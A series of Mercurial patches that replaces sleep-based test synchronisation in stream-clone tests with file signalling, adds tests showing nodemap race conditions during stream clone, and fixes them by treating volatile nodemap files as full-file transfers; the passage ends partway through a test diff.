kinda trivial, but having a simple function avoid silly mistake. 
Differential Revision: https://phab.mercurial-scm.org/D10477 diff --git a/mercurial/testing/__init__.py b/mercurial/testing/__init__.py --- a/mercurial/testing/__init__.py +++ b/mercurial/testing/__init__.py @@ -28,3 +28,8 @@ if time.time() - start > timeout: raise RuntimeError(b"timed out waiting for file: %s" % path) time.sleep(0.01) + + +def write_file(path, content=b''): + with open(path, 'wb') as f: + f.write(content) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618852348 -7200 # Mon Apr 19 19:12:28 2021 +0200 # Node ID faa43f09ad980b7ea36c95ea39708fbcf11c692f # Parent 52cee44aa1a073fa34b79c7b03eea53e2a803169 streamclone: remove sleep based "synchronisation" in tests Sleep based test synchronisation does not work. Variation in machine performance and load can make the two process miss their windows. Instead we migrate to explicit signaling through the file system as other tests file are using. Differential Revision: https://phab.mercurial-scm.org/D10478 diff --git a/mercurial/streamclone.py b/mercurial/streamclone.py --- a/mercurial/streamclone.py +++ b/mercurial/streamclone.py @@ -247,6 +247,8 @@ if size: entries.append((name, size)) total_bytes += size + _test_sync_point_walk_1(repo) + _test_sync_point_walk_2(repo) repo.ui.debug( b'%d files, %d bytes to transfer\n' % (len(entries), total_bytes) @@ -593,6 +595,14 @@ fp.close() +def _test_sync_point_walk_1(repo): + """a function for synchronisation during tests""" + + +def _test_sync_point_walk_2(repo): + """a function for synchronisation during tests""" + + def generatev2(repo, includes, excludes, includeobsmarkers): """Emit content for version 2 of a streaming clone. 
@@ -635,6 +645,8 @@ chunks = _emit2(repo, entries, totalfilesize) first = next(chunks) assert first is None + _test_sync_point_walk_1(repo) + _test_sync_point_walk_2(repo) return len(entries), totalfilesize, chunks diff --git a/tests/test-clone-uncompressed.t b/tests/test-clone-uncompressed.t --- a/tests/test-clone-uncompressed.t +++ b/tests/test-clone-uncompressed.t @@ -433,14 +433,35 @@ extension for delaying the server process so we reliably can modify the repo while cloning - $ cat > delayer.py <<EOF - > import time - > from mercurial import extensions, vfs - > def __call__(orig, self, path, *args, **kwargs): - > if path == 'data/f1.i': - > time.sleep(2) - > return orig(self, path, *args, **kwargs) - > extensions.wrapfunction(vfs.vfs, '__call__', __call__) + $ cat > stream_steps.py <<EOF + > import os + > import sys + > from mercurial import ( + > encoding, + > extensions, + > streamclone, + > testing, + > ) + > WALKED_FILE_1 = encoding.environ[b'HG_TEST_STREAM_WALKED_FILE_1'] + > WALKED_FILE_2 = encoding.environ[b'HG_TEST_STREAM_WALKED_FILE_2'] + > + > def _test_sync_point_walk_1(orig, repo): + > testing.write_file(WALKED_FILE_1) + > + > def _test_sync_point_walk_2(orig, repo): + > assert repo._currentlock(repo._lockref) is None + > testing.wait_file(WALKED_FILE_2) + > + > extensions.wrapfunction( + > streamclone, + > '_test_sync_point_walk_1', + > _test_sync_point_walk_1 + > ) + > extensions.wrapfunction( + > streamclone, + > '_test_sync_point_walk_2', + > _test_sync_point_walk_2 + > ) > EOF prepare repo with small and big file to cover both code paths in emitrevlogdata @@ -449,20 +470,32 @@ $ touch repo/f1 $ $TESTDIR/seq.py 50000 > repo/f2 $ hg -R repo ci -Aqm "0" - $ hg serve -R repo -p $HGPORT1 -d --pid-file=hg.pid --config extensions.delayer=delayer.py + $ HG_TEST_STREAM_WALKED_FILE_1="$TESTTMP/sync_file_walked_1" + $ export HG_TEST_STREAM_WALKED_FILE_1 + $ HG_TEST_STREAM_WALKED_FILE_2="$TESTTMP/sync_file_walked_2" + $ export HG_TEST_STREAM_WALKED_FILE_2 
+ $ HG_TEST_STREAM_WALKED_FILE_3="$TESTTMP/sync_file_walked_3" + $ export HG_TEST_STREAM_WALKED_FILE_3 +# $ cat << EOF >> $HGRCPATH +# > [hooks] +# > pre-clone=rm -f "$TESTTMP/sync_file_walked_*" +# > EOF + $ hg serve -R repo -p $HGPORT1 -d --error errors.log --pid-file=hg.pid --config extensions.stream_steps="$RUNTESTDIR/testlib/ext-stream-clone-steps.py" $ cat hg.pid >> $DAEMON_PIDS clone while modifying the repo between stating file with write lock and actually serving file content - $ hg clone -q --stream -U http://localhost:$HGPORT1 clone & - $ sleep 1 + $ (hg clone -q --stream -U http://localhost:$HGPORT1 clone; touch "$HG_TEST_STREAM_WALKED_FILE_3") & + $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_1 $ echo >> repo/f1 $ echo >> repo/f2 $ hg -R repo ci -m "1" --config ui.timeout.warn=-1 - $ wait + $ touch $HG_TEST_STREAM_WALKED_FILE_2 + $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_3 $ hg -R clone id 000000000000 + $ cat errors.log $ cd .. Stream repository with bookmarks diff --git a/tests/testlib/ext-stream-clone-steps.py b/tests/testlib/ext-stream-clone-steps.py new file mode 100644 --- /dev/null +++ b/tests/testlib/ext-stream-clone-steps.py @@ -0,0 +1,31 @@ +from __future__ import absolute_import + +from mercurial import ( + encoding, + extensions, + streamclone, + testing, +) + + +WALKED_FILE_1 = encoding.environ[b'HG_TEST_STREAM_WALKED_FILE_1'] +WALKED_FILE_2 = encoding.environ[b'HG_TEST_STREAM_WALKED_FILE_2'] + + +def _test_sync_point_walk_1(orig, repo): + testing.write_file(WALKED_FILE_1) + + +def _test_sync_point_walk_2(orig, repo): + assert repo._currentlock(repo._lockref) is None + testing.wait_file(WALKED_FILE_2) + + +def uisetup(ui): + extensions.wrapfunction( + streamclone, '_test_sync_point_walk_1', _test_sync_point_walk_1 + ) + + extensions.wrapfunction( + streamclone, '_test_sync_point_walk_2', _test_sync_point_walk_2 + ) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # 
Date 1618856653 -7200 # Mon Apr 19 20:24:13 2021 +0200 # Node ID d70319c3ca14acfc624fa561f4709cb5ec4396d7 # Parent faa43f09ad980b7ea36c95ea39708fbcf11c692f nodemap: add a test about racy commit during stream clone That test show that the resulting client nodemap is different from the server one. This happens because the server one transferred a corrupted node map. The data file match the pre-commit content while the docket has post commit content. As the result the nodemap was detected invalid and recomputed. When running without the rust implementation, the code is also generating a new datafile unconditionally, This mean the older file is no longer there are transfer time, resulting in a crash. We will fix this issue later, but we start with writing tests highlighting the issue. Differential Revision: https://phab.mercurial-scm.org/D10479 diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -809,10 +809,15 @@ stream clone ------------- +============ The persistent nodemap should exist after a streaming clone +Simple case +----------- + +No race condition + $ hg clone -U --stream --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/test-repo stream-clone --debug | egrep '00(changelog|manifest)' adding [s] 00manifest.n (70 bytes) adding [s] 00manifest.d (452 KB) (no-zstd !) 
@@ -836,3 +841,128 @@ data-length: 121088 data-unused: 0 data-unused: 0.000% + +new data appened +----------------- + +Other commit happening on the server during the stream clone + +setup the step-by-step stream cloning + + $ HG_TEST_STREAM_WALKED_FILE_1="$TESTTMP/sync_file_walked_1" + $ export HG_TEST_STREAM_WALKED_FILE_1 + $ HG_TEST_STREAM_WALKED_FILE_2="$TESTTMP/sync_file_walked_2" + $ export HG_TEST_STREAM_WALKED_FILE_2 + $ HG_TEST_STREAM_WALKED_FILE_3="$TESTTMP/sync_file_walked_3" + $ export HG_TEST_STREAM_WALKED_FILE_3 + $ cat << EOF >> test-repo/.hg/hgrc + > [extensions] + > steps=$RUNTESTDIR/testlib/ext-stream-clone-steps.py + > EOF + +Check and record file state beforehand + + $ f --size test-repo/.hg/store/00changelog* + test-repo/.hg/store/00changelog-*.nd: size=121088 (glob) + test-repo/.hg/store/00changelog.d: size=376891 (zstd !) + test-repo/.hg/store/00changelog.d: size=368890 (no-zstd !) + test-repo/.hg/store/00changelog.i: size=320384 + test-repo/.hg/store/00changelog.n: size=70 + $ hg -R test-repo debugnodemap --metadata | tee server-metadata.txt + uid: * (glob) + tip-rev: 5005 + tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe + data-length: 121088 + data-unused: 0 + data-unused: 0.000% + +Prepare a commit + + $ echo foo >> test-repo/foo + $ hg -R test-repo/ add test-repo/foo + +Do a mix of clone and commit at the same time so that the file listed on disk differ at actual transfer time. 
+ + $ (hg clone -U --stream --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/test-repo stream-clone-race-1 --debug 2>> clone-output | egrep '00(changelog|manifest)' >> clone-output; touch $HG_TEST_STREAM_WALKED_FILE_3) & + $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_1 + $ hg -R test-repo/ commit -m foo + $ touch $HG_TEST_STREAM_WALKED_FILE_2 + $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_3 + $ cat clone-output + remote: abort: unexpected error: [Errno 2] $ENOENT$: *'$TESTTMP/test-repo/.hg/store/00manifest-*.nd' (glob) (known-bad-output no-rust no-pure !) + abort: pull failed on remote (known-bad-output no-rust no-pure !) + adding [s] 00manifest.n (70 bytes) + adding [s] 00manifest.d (491 KB) (zstd !) + adding [s] 00manifest.d (452 KB) (no-zstd !) + remote: abort: $ENOENT$: '$TESTTMP/test-repo/.hg/store/00manifest-*.nd' (glob) (known-bad-output no-rust no-pure !) + adding [s] 00manifest-*.nd (118 KB) (glob) (rust !) + adding [s] 00changelog.n (70 bytes) (rust !) + adding [s] 00changelog.d (368 KB) (zstd rust !) + adding [s] 00changelog-*.nd (118 KB) (glob) (rust !) + adding [s] 00manifest.i (313 KB) (rust !) + adding [s] 00changelog.i (313 KB) (rust !) + adding [s] 00manifest-*.nd (118 KB) (glob) (pure !) + adding [s] 00changelog.n (70 bytes) (pure !) + adding [s] 00changelog.d (360 KB) (no-zstd !) + adding [s] 00changelog-*.nd (118 KB) (glob) (pure !) + adding [s] 00manifest.i (313 KB) (pure !) + adding [s] 00changelog.i (313 KB) (pure !) + +Check the result state + + $ f --size stream-clone-race-1/.hg/store/00changelog* + stream-clone-race-1/.hg/store/00changelog*: file not found (known-bad-output no-rust no-pure !) + stream-clone-race-1/.hg/store/00changelog-*.nd: size=121088 (glob) (rust !) + stream-clone-race-1/.hg/store/00changelog.d: size=376891 (zstd rust !) + stream-clone-race-1/.hg/store/00changelog.i: size=320384 (rust !) + stream-clone-race-1/.hg/store/00changelog.n: size=70 (rust !) 
+ stream-clone-race-1/.hg/store/00changelog-*.nd: size=121088 (glob) (pure !) + stream-clone-race-1/.hg/store/00changelog.d: size=368890 (no-zstd pure !) + stream-clone-race-1/.hg/store/00changelog.i: size=320384 (pure !) + stream-clone-race-1/.hg/store/00changelog.n: size=70 (pure !) + + $ hg -R stream-clone-race-1 debugnodemap --metadata | tee client-metadata.txt + abort: repository stream-clone-race-1 not found (known-bad-output no-rust no-pure !) + uid: * (glob) (rust !) + tip-rev: 5005 (rust !) + tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe (rust !) + data-length: 121088 (rust !) + data-unused: 0 (rust !) + data-unused: 0.000% (rust !) + uid: * (glob) (pure !) + tip-rev: 5005 (pure !) + tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe (pure !) + data-length: 121088 (pure !) + data-unused: 0 (pure !) + data-unused: 0.000% (pure !) + +We get a usable nodemap, so no rewrite would be needed and the metadata should be identical +(ie: the following diff should be empty) + + $ diff -u server-metadata.txt client-metadata.txt + --- server-metadata.txt * (glob) (known-bad-output !) + +++ client-metadata.txt * (glob) (known-bad-output !) + @@ -1,4 +1,4 @@ (known-bad-output rust !) + @@ -1,4 +1,4 @@ (known-bad-output pure !) + @@ -1,6 +0,0 @@ (known-bad-output no-rust no-pure !) + -uid: * (glob) (known-bad-output !) + +uid: * (glob) (known-bad-output rust !) + tip-rev: 5005 (known-bad-output rust !) + tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe (known-bad-output rust !) + data-length: 121088 (known-bad-output rust !) + +uid: * (glob) (known-bad-output pure !) + tip-rev: 5005 (known-bad-output pure !) + tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe (known-bad-output pure !) + data-length: 121088 (known-bad-output pure !) + -tip-rev: 5005 (known-bad-output no-rust no-pure !) + -tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe (known-bad-output no-rust no-pure !) + -data-length: 121088 (known-bad-output no-rust no-pure !) 
+ -data-unused: 0 (known-bad-output no-rust no-pure !) + -data-unused: 0.000% (known-bad-output no-rust no-pure !) + [1] + +Clean up after the test. + + $ rm -f "$HG_TEST_STREAM_WALKED_FILE_1" + $ rm -f "$HG_TEST_STREAM_WALKED_FILE_2" + $ rm -f "$HG_TEST_STREAM_WALKED_FILE_3" # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618858066 -7200 # Mon Apr 19 20:47:46 2021 +0200 # Node ID dc95c8ca171f9f8f5154156012df9a7cd258cc66 # Parent d70319c3ca14acfc624fa561f4709cb5ec4396d7 nodemap: add a test about nodemap "vacuum" during stream clone When the nodemap "vacuum" it generate a new datafile, with a new unique name and delete the old one. This confuse the stream clone code and create the same kind of crash we were seeing in the previous patch. We build a test case where this happens. The next changeset will contains a fix We can also notice that we are, wrongfully exchanging `undo.*` files that the client will not be able to use. This will be dealt with soon. Differential Revision: https://phab.mercurial-scm.org/D10480 diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -966,3 +966,100 @@ $ rm -f "$HG_TEST_STREAM_WALKED_FILE_1" $ rm -f "$HG_TEST_STREAM_WALKED_FILE_2" $ rm -f "$HG_TEST_STREAM_WALKED_FILE_3" + +full regeneration +----------------- + +A full nodemap is generated + +(ideally this test would append enough data to make sure the nodemap data file +get changed, however to make thing simpler we will force the regeneration for +this test. + +Check the initial state + + $ f --size test-repo/.hg/store/00changelog* + test-repo/.hg/store/00changelog-*.nd: size=121344 (glob) (rust !) + test-repo/.hg/store/00changelog-*.nd: size=121344 (glob) (pure !) + test-repo/.hg/store/00changelog-*.nd: size=121152 (glob) (no-rust no-pure !) + test-repo/.hg/store/00changelog.d: size=376950 (zstd !) 
+ test-repo/.hg/store/00changelog.d: size=368949 (no-zstd !) + test-repo/.hg/store/00changelog.i: size=320448 + test-repo/.hg/store/00changelog.n: size=70 + $ hg -R test-repo debugnodemap --metadata | tee server-metadata-2.txt + uid: * (glob) + tip-rev: 5006 + tip-node: ed2ec1eef9aa2a0ec5057c51483bc148d03e810b + data-length: 121344 (rust !) + data-unused: 192 (rust !) + data-unused: 0.158% (rust !) + data-length: 121152 (no-rust no-pure !) + data-unused: 0 (no-rust no-pure !) + data-unused: 0.000% (no-rust no-pure !) + data-length: 121344 (pure !) + data-unused: 192 (pure !) + data-unused: 0.158% (pure !) + +Performe the mix of clone and full refresh of the nodemap, so that the files +(and filenames) are different between listing time and actual transfer time. + + $ (hg clone -U --stream --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/test-repo stream-clone-race-2 --debug 2>> clone-output-2 | egrep '00(changelog|manifest)' >> clone-output-2; touch $HG_TEST_STREAM_WALKED_FILE_3) & + $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_1 + $ rm test-repo/.hg/store/00changelog.n + $ rm test-repo/.hg/store/00changelog-*.nd + $ hg -R test-repo/ debugupdatecache + $ touch $HG_TEST_STREAM_WALKED_FILE_2 + $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_3 + $ cat clone-output-2 + remote: abort: unexpected error: [Errno 2] $ENOENT$: *'$TESTTMP/test-repo/.hg/store/00changelog-*.nd' (glob) (known-bad-output rust !) + remote: abort: unexpected error: [Errno 2] $ENOENT$: *'$TESTTMP/test-repo/.hg/store/00changelog-*.nd' (glob) (known-bad-output pure !) + remote: abort: unexpected error: [Errno 2] $ENOENT$: *'$TESTTMP/test-repo/.hg/store/00manifest-*.nd' (glob) (known-bad-output no-pure no-rust !) + abort: pull failed on remote (known-bad-output !) + adding [s] undo.backup.00manifest.n (70 bytes) (known-bad-output !) + adding [s] undo.backup.00changelog.n (70 bytes) (known-bad-output !) 
+ adding [s] 00manifest.n (70 bytes) + adding [s] 00manifest.d (492 KB) (zstd !) + adding [s] 00manifest.d (452 KB) (no-zstd !) + adding [s] 00manifest-*.nd (118 KB) (glob) (rust !) + adding [s] 00manifest-*.nd (118 KB) (glob) (pure !) + remote: abort: $ENOENT$: '$TESTTMP/test-repo/.hg/store/00changelog-*.nd' (glob) (known-bad-output rust !) + remote: abort: $ENOENT$: '$TESTTMP/test-repo/.hg/store/00manifest-*.nd' (glob) (known-bad-output no-pure no-rust !) + adding [s] 00changelog.n (70 bytes) (pure !) + adding [s] 00changelog.d (360 KB) (no-zstd !) + remote: abort: $ENOENT$: '$TESTTMP/test-repo/.hg/store/00changelog-*.nd' (glob) (known-bad-output pure !) + +Check the result. + + $ f --size stream-clone-race-2/.hg/store/00changelog* + stream-clone-race-2/.hg/store/00changelog*: file not found (known-bad-output !) + + $ hg -R stream-clone-race-2 debugnodemap --metadata | tee client-metadata-2.txt + abort: repository stream-clone-race-2 not found (known-bad-output !) + +We get a usable nodemap, so no rewrite would be needed and the metadata should be identical +(ie: the following diff should be empty) + + $ diff -u server-metadata-2.txt client-metadata-2.txt + --- server-metadata-2.txt * (glob) (known-bad-output !) + +++ client-metadata-2.txt * (glob) (known-bad-output !) + @@ -1,6 +0,0 @@ (known-bad-output !) + -uid: * (glob) (known-bad-output !) + -tip-rev: 5006 (known-bad-output !) + -tip-node: ed2ec1eef9aa2a0ec5057c51483bc148d03e810b (known-bad-output !) + -data-length: 121344 (known-bad-output rust !) + -data-unused: 192 (known-bad-output rust !) + -data-unused: 0.158% (known-bad-output rust !) + -data-length: 121344 (known-bad-output pure !) + -data-unused: 192 (known-bad-output pure !) + -data-unused: 0.158% (known-bad-output pure !) + -data-length: 121152 (known-bad-output no-rust no-pure !) + -data-unused: 0 (known-bad-output no-rust no-pure !) + -data-unused: 0.000% (known-bad-output no-rust no-pure !) 
+ [1] + +Clean up after the test + + $ rm -f $HG_TEST_STREAM_WALKED_FILE_1 + $ rm -f $HG_TEST_STREAM_WALKED_FILE_2 + $ rm -f $HG_TEST_STREAM_WALKED_FILE_3 + # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618888135 -7200 # Tue Apr 20 05:08:55 2021 +0200 # Node ID aed6ceaad6d7f4de350550c7486758ea1290d09d # Parent dc95c8ca171f9f8f5154156012df9a7cd258cc66 streamclone: treat volatile file as "fullfile" The nodemap related file might change (or get deleted) during the stream clone in a way incompatible with the streaming process. So we introduce a new flag for this type of file and integrate it with the existing `revlog_type` field recently added to `store.walk` returns. We use that new flat to dispatch such file to the existing mechanism for "atomic replacement" file for the nodemap docket and datafile. This fix the bugs we have been adding tests for. Strictly speaking, the nodemap datafile is happened only a could maybe be used in a slightly more efficient way, however this is good enough for now. Differential Revision: https://phab.mercurial-scm.org/D10481 diff --git a/mercurial/store.py b/mercurial/store.py --- a/mercurial/store.py +++ b/mercurial/store.py @@ -389,6 +389,11 @@ REVLOG_FILES_MAIN_EXT = (b'.i', b'i.tmpcensored') REVLOG_FILES_OTHER_EXT = (b'.d', b'.n', b'.nd', b'd.tmpcensored') +# files that are "volatile" and might change between listing and streaming +# +# note: the ".nd" file are nodemap data and won't "change" but they might be +# deleted. 
+REVLOG_FILES_VOLATILE_EXT = (b'.n', b'.nd') def is_revlog(f, kind, st): @@ -401,7 +406,10 @@ if f.endswith(REVLOG_FILES_MAIN_EXT): return FILEFLAGS_REVLOG_MAIN elif f.endswith(REVLOG_FILES_OTHER_EXT): - return FILETYPE_FILELOG_OTHER + t = FILETYPE_FILELOG_OTHER + if f.endswith(REVLOG_FILES_VOLATILE_EXT): + t |= FILEFLAGS_VOLATILE + return t # the file is part of changelog data @@ -418,6 +426,9 @@ # a secondary file for a revlog FILEFLAGS_REVLOG_OTHER = 1 << 0 +# files that are "volatile" and might change between listing and streaming +FILEFLAGS_VOLATILE = 1 << 20 + FILETYPE_CHANGELOG_MAIN = FILEFLAGS_CHANGELOG | FILEFLAGS_REVLOG_MAIN FILETYPE_CHANGELOG_OTHER = FILEFLAGS_CHANGELOG | FILEFLAGS_REVLOG_OTHER FILETYPE_MANIFESTLOG_MAIN = FILEFLAGS_MANIFESTLOG | FILEFLAGS_REVLOG_MAIN diff --git a/mercurial/streamclone.py b/mercurial/streamclone.py --- a/mercurial/streamclone.py +++ b/mercurial/streamclone.py @@ -628,7 +628,10 @@ repo.ui.debug(b'scanning\n') for rl_type, name, ename, size in _walkstreamfiles(repo, matcher): if size: - entries.append((_srcstore, name, _fileappend, size)) + ft = _fileappend + if rl_type & store.FILEFLAGS_VOLATILE: + ft = _filefull + entries.append((_srcstore, name, ft, size)) totalfilesize += size for name in _walkstreamfullstorefiles(repo): if repo.svfs.exists(name): diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -820,13 +820,13 @@ $ hg clone -U --stream --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/test-repo stream-clone --debug | egrep '00(changelog|manifest)' adding [s] 00manifest.n (70 bytes) - adding [s] 00manifest.d (452 KB) (no-zstd !) - adding [s] 00manifest.d (491 KB) (zstd !) adding [s] 00manifest-*.nd (118 KB) (glob) adding [s] 00changelog.n (70 bytes) + adding [s] 00changelog-*.nd (118 KB) (glob) + adding [s] 00manifest.d (452 KB) (no-zstd !) + adding [s] 00manifest.d (491 KB) (zstd !) 
adding [s] 00changelog.d (360 KB) (no-zstd !) adding [s] 00changelog.d (368 KB) (zstd !) - adding [s] 00changelog-*.nd (118 KB) (glob) adding [s] 00manifest.i (313 KB) adding [s] 00changelog.i (313 KB) $ ls -1 stream-clone/.hg/store/ | egrep '00(changelog|manifest)(\.n|-.*\.nd)' @@ -889,77 +889,54 @@ $ touch $HG_TEST_STREAM_WALKED_FILE_2 $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_3 $ cat clone-output - remote: abort: unexpected error: [Errno 2] $ENOENT$: *'$TESTTMP/test-repo/.hg/store/00manifest-*.nd' (glob) (known-bad-output no-rust no-pure !) - abort: pull failed on remote (known-bad-output no-rust no-pure !) adding [s] 00manifest.n (70 bytes) - adding [s] 00manifest.d (491 KB) (zstd !) + adding [s] 00manifest-*.nd (118 KB) (glob) + adding [s] 00changelog.n (70 bytes) + adding [s] 00changelog-*.nd (118 KB) (glob) adding [s] 00manifest.d (452 KB) (no-zstd !) - remote: abort: $ENOENT$: '$TESTTMP/test-repo/.hg/store/00manifest-*.nd' (glob) (known-bad-output no-rust no-pure !) - adding [s] 00manifest-*.nd (118 KB) (glob) (rust !) - adding [s] 00changelog.n (70 bytes) (rust !) - adding [s] 00changelog.d (368 KB) (zstd rust !) - adding [s] 00changelog-*.nd (118 KB) (glob) (rust !) - adding [s] 00manifest.i (313 KB) (rust !) - adding [s] 00changelog.i (313 KB) (rust !) - adding [s] 00manifest-*.nd (118 KB) (glob) (pure !) - adding [s] 00changelog.n (70 bytes) (pure !) + adding [s] 00manifest.d (491 KB) (zstd !) adding [s] 00changelog.d (360 KB) (no-zstd !) - adding [s] 00changelog-*.nd (118 KB) (glob) (pure !) - adding [s] 00manifest.i (313 KB) (pure !) - adding [s] 00changelog.i (313 KB) (pure !) + adding [s] 00changelog.d (368 KB) (zstd !) + adding [s] 00manifest.i (313 KB) + adding [s] 00changelog.i (313 KB) Check the result state $ f --size stream-clone-race-1/.hg/store/00changelog* - stream-clone-race-1/.hg/store/00changelog*: file not found (known-bad-output no-rust no-pure !) 
- stream-clone-race-1/.hg/store/00changelog*: file not found (known-bad-output no-rust no-pure !) - stream-clone-race-1/.hg/store/00changelog-*.nd: size=121088 (glob) (rust !) - stream-clone-race-1/.hg/store/00changelog.d: size=376891 (zstd rust !) - stream-clone-race-1/.hg/store/00changelog.i: size=320384 (rust !) - stream-clone-race-1/.hg/store/00changelog.n: size=70 (rust !) - stream-clone-race-1/.hg/store/00changelog-*.nd: size=121088 (glob) (pure !) - stream-clone-race-1/.hg/store/00changelog.d: size=368890 (no-zstd pure !) - stream-clone-race-1/.hg/store/00changelog.i: size=320384 (pure !) - stream-clone-race-1/.hg/store/00changelog.n: size=70 (pure !) + stream-clone-race-1/.hg/store/00changelog-*.nd: size=121088 (glob) + stream-clone-race-1/.hg/store/00changelog.d: size=368890 (no-zstd !) + stream-clone-race-1/.hg/store/00changelog.d: size=376891 (zstd !) + stream-clone-race-1/.hg/store/00changelog.i: size=320384 + stream-clone-race-1/.hg/store/00changelog.n: size=70 $ hg -R stream-clone-race-1 debugnodemap --metadata | tee client-metadata.txt - abort: repository stream-clone-race-1 not found (known-bad-output no-rust no-pure !) - uid: * (glob) (rust !) - tip-rev: 5005 (rust !) - tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe (rust !) - data-length: 121088 (rust !) - data-unused: 0 (rust !) - data-unused: 0.000% (rust !) - uid: * (glob) (pure !) - tip-rev: 5005 (pure !) - tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe (pure !) - data-length: 121088 (pure !) - data-unused: 0 (pure !) - data-unused: 0.000% (pure !) + uid: * (glob) + tip-rev: 5005 + tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe + data-length: 121088 + data-unused: 0 + data-unused: 0.000% We get a usable nodemap, so no rewrite would be needed and the metadata should be identical (ie: the following diff should be empty) +This isn't the case for the `no-rust` `no-pure` implementation as it uses a very minimal nodemap implementation that unconditionally rewrites the nodemap "all the time".
+ +#if no-rust no-pure $ diff -u server-metadata.txt client-metadata.txt - --- server-metadata.txt * (glob) (known-bad-output !) - +++ client-metadata.txt * (glob) (known-bad-output !) - @@ -1,4 +1,4 @@ (known-bad-output rust !) - @@ -1,4 +1,4 @@ (known-bad-output pure !) - @@ -1,6 +0,0 @@ (known-bad-output no-rust no-pure !) - -uid: * (glob) (known-bad-output !) - +uid: * (glob) (known-bad-output rust !) - tip-rev: 5005 (known-bad-output rust !) - tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe (known-bad-output rust !) - data-length: 121088 (known-bad-output rust !) - +uid: * (glob) (known-bad-output pure !) - tip-rev: 5005 (known-bad-output pure !) - tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe (known-bad-output pure !) - data-length: 121088 (known-bad-output pure !) - -tip-rev: 5005 (known-bad-output no-rust no-pure !) - -tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe (known-bad-output no-rust no-pure !) - -data-length: 121088 (known-bad-output no-rust no-pure !) - -data-unused: 0 (known-bad-output no-rust no-pure !) - -data-unused: 0.000% (known-bad-output no-rust no-pure !) + --- server-metadata.txt * (glob) + +++ client-metadata.txt * (glob) + @@ -1,4 +1,4 @@ + -uid: * (glob) + +uid: * (glob) + tip-rev: 5005 + tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe + data-length: 121088 [1] +#else + $ diff -u server-metadata.txt client-metadata.txt +#endif + Clean up after the test. @@ -991,14 +968,14 @@ tip-rev: 5006 tip-node: ed2ec1eef9aa2a0ec5057c51483bc148d03e810b data-length: 121344 (rust !) + data-length: 121344 (pure !) + data-length: 121152 (no-rust no-pure !) data-unused: 192 (rust !) - data-unused: 0.158% (rust !) - data-length: 121152 (no-rust no-pure !) + data-unused: 192 (pure !) data-unused: 0 (no-rust no-pure !) + data-unused: 0.158% (rust !) + data-unused: 0.158% (pure !) data-unused: 0.000% (no-rust no-pure !) - data-length: 121344 (pure !) - data-unused: 192 (pure !) - data-unused: 0.158% (pure !) 
Performe the mix of clone and full refresh of the nodemap, so that the files (and filenames) are different between listing time and actual transfer time. @@ -1011,51 +988,63 @@ $ touch $HG_TEST_STREAM_WALKED_FILE_2 $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_3 $ cat clone-output-2 - remote: abort: unexpected error: [Errno 2] $ENOENT$: *'$TESTTMP/test-repo/.hg/store/00changelog-*.nd' (glob) (known-bad-output rust !) - remote: abort: unexpected error: [Errno 2] $ENOENT$: *'$TESTTMP/test-repo/.hg/store/00changelog-*.nd' (glob) (known-bad-output pure !) - remote: abort: unexpected error: [Errno 2] $ENOENT$: *'$TESTTMP/test-repo/.hg/store/00manifest-*.nd' (glob) (known-bad-output no-pure no-rust !) - abort: pull failed on remote (known-bad-output !) adding [s] undo.backup.00manifest.n (70 bytes) (known-bad-output !) adding [s] undo.backup.00changelog.n (70 bytes) (known-bad-output !) adding [s] 00manifest.n (70 bytes) + adding [s] 00manifest-*.nd (118 KB) (glob) + adding [s] 00changelog.n (70 bytes) + adding [s] 00changelog-*.nd (118 KB) (glob) adding [s] 00manifest.d (492 KB) (zstd !) adding [s] 00manifest.d (452 KB) (no-zstd !) - adding [s] 00manifest-*.nd (118 KB) (glob) (rust !) - adding [s] 00manifest-*.nd (118 KB) (glob) (pure !) - remote: abort: $ENOENT$: '$TESTTMP/test-repo/.hg/store/00changelog-*.nd' (glob) (known-bad-output rust !) - remote: abort: $ENOENT$: '$TESTTMP/test-repo/.hg/store/00manifest-*.nd' (glob) (known-bad-output no-pure no-rust !) - adding [s] 00changelog.n (70 bytes) (pure !) adding [s] 00changelog.d (360 KB) (no-zstd !) - remote: abort: $ENOENT$: '$TESTTMP/test-repo/.hg/store/00changelog-*.nd' (glob) 